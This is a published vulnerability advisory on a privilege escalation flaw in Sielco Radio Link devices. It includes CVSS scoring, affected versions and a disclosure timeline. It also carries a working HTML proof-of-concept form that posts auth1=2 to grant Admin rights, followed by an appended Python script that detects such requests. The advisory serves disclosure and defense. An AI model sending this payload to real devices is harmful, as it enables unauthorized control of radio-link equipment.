zeroscience, Gjoko Krstic, ZSL-2023-5759
Mar 30, 2023 - 12:00 a.m.

Sielco Radio Link 2.06 Remote Privilege Escalation

2023-03-30 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score: 9 High (Confidence: High)
EPSS: 0.001 Low (Percentile: 19.3%)

Title: Sielco Radio Link 2.06 Remote Privilege Escalation
Advisory ID: ZSL-2023-5759
Type: Local/Remote
Impact: Privilege Escalation
Risk: (4/5)
Release Date: 30.03.2023

Summary

Sielco develops and produces radio links for all transmission and reception needs, thanks to innovative units and excellent performances, accompanied by a high reliability and low consumption.

Description

The application suffers from a privilege escalation vulnerability. A user with Read permissions can elevate his/her privileges by sending an HTTP POST request that sets the parameter ‘auth1’, ‘auth2’ or ‘auth3’ to the integer value ‘1’ for Write or ‘2’ for Admin permissions.

Vendor

Sielco S.r.l - <https://www.sielco.org>

Affected Version

2.06 (RTX19)
2.05 (RTX19)
2.00 (EXC19)
1.60 (RTX19)
1.59 (RTX19)
1.55 (EXC19)

Tested On

lwIP/2.1.1
Web/2.9.3

Vendor Status

[26.01.2023] Vulnerability discovered.
[27.01.2023] Contact with the vendor and CSIRT Italia.
[29.03.2023] No response from the vendor.
[29.03.2023] No response from the CSIRT team.
[30.03.2023] Public security advisory released.

PoC

sielco_rl_eop.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://packetstormsecurity.com/files/171849/>
[2] <https://exchange.xforce.ibmcloud.com/vulnerabilities/253069>
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/269709>
[4] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-08>
[5] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-41966>
[6] <https://nvd.nist.gov/vuln/detail/CVE-2023-41966>

Changelog

[30.03.2023] - Initial release
[03.11.2023] - Added reference [1], [2], [3], [4], [5] and [6]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<!--


Sielco Radio Link 2.06 Remote Privilege Escalation


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.06 (RTX19)
                  2.05 (RTX19)
                  2.00 (EXC19)
                  1.60 (RTX19)
                  1.59 (RTX19)
                  1.55 (EXC19)

Summary: Sielco develops and produces radio links for all transmission
and reception needs, thanks to innovative units and excellent performances,
accompanied by a high reliability and low consumption.

Desc: The application suffers from a privilege escalation vulnerability.
A user with Read permissions can elevate his/her privileges by sending
a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'
to integer value '1' for Write or '2' for Admin permissions.

Tested on: lwIP/2.1.1
           Web/2.9.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5759
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5759.php


26.01.2023

--><html>
<body>
<form action="http://radiolink/protect/users_rx.htm" method="POST">
<input name="pwd0" type="hidden" value=""/>
<input name="pwd0bis" type="hidden" value=""/>
<input name="user1" type="hidden" value="testingus"/>
<input name="pwd1" type="hidden" value=""/>
<input name="pwd1bis" type="hidden" value=""/>
<input name="auth1" type="hidden" value="2"/>
<input name="user2" type="hidden" value=""/>
<input name="pwd2" type="hidden" value=""/>
<input name="pwd2bis" type="hidden" value=""/>
<input name="auth2" type="hidden" value="0"/>
<input name="user3" type="hidden" value=""/>
<input name="pwd3" type="hidden" value=""/>
<input name="pwd3bis" type="hidden" value=""/>
<input name="auth3" type="hidden" value="0"/>
<input type="submit" value="Escalate"/>
</form>
</body>
</html>
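
A detection check for the request described above, added here as an example (it is not part of the advisory or of any vendor code): it scans requests captured at a proxy in front of the device for POSTs to /protect/users_rx.htm that set auth1, auth2 or auth3 above the level the sending account is recorded as holding. The record layout, the account inventory and the mapping of 0 to Read are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

USERS_PATH = "/protect/users_rx.htm"        # form action in the PoC
AUTH_FIELDS = ("auth1", "auth2", "auth3")   # parameters named in the advisory
LEVEL_NAMES = {0: "Read", 1: "Write", 2: "Admin"}  # 0 = Read is an assumption

def requested_levels(body):
    """Return {field: highest level requested} for each authN field in a form body."""
    levels = {}
    for field, values in parse_qs(body).items():
        if field not in AUTH_FIELDS:
            continue
        parsed = []
        for value in values:          # a repeated field is checked in full
            try:
                parsed.append(int(value))
            except ValueError:        # unparsable value: treat as worst case
                parsed.append(max(LEVEL_NAMES))
        levels[field] = max(parsed)
    return levels

def find_escalations(records, inventory):
    """Flag POSTs to the users page that ask for more than the sender holds."""
    alerts = []
    for rec in records:
        if rec["method"].upper() != "POST":
            continue
        if urlsplit(rec["path"]).path != USERS_PATH:
            continue
        held = inventory.get(rec["user"], 0)   # unknown account: assume Read
        for field, level in sorted(requested_levels(rec["body"]).items()):
            if level > held:
                alerts.append((rec["user"], field, LEVEL_NAMES.get(level, str(level))))
    return alerts

# Constructed sample data: proxy records and an account inventory (user -> level).
INVENTORY = {"operator": 0, "admin": 2}
RECORDS = [
    {"user": "admin", "method": "POST", "path": USERS_PATH,
     "body": "user1=operator&auth1=0&auth2=0&auth3=0"},
    {"user": "operator", "method": "POST", "path": USERS_PATH,
     "body": "user1=operator&auth1=2&auth2=0&auth3=0"},
    {"user": "operator", "method": "POST", "path": USERS_PATH + "?x=1",
     "body": "auth2=0&auth2=1"},
    {"user": "operator", "method": "GET", "path": USERS_PATH, "body": ""},
]

if __name__ == "__main__":
    for alert in find_escalations(RECORDS, INVENTORY):
        print("ALERT", *alert)
```

The same comparison, requested level against the authenticated sender's own level, is the authorization check the advisory shows to be missing on the device side.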
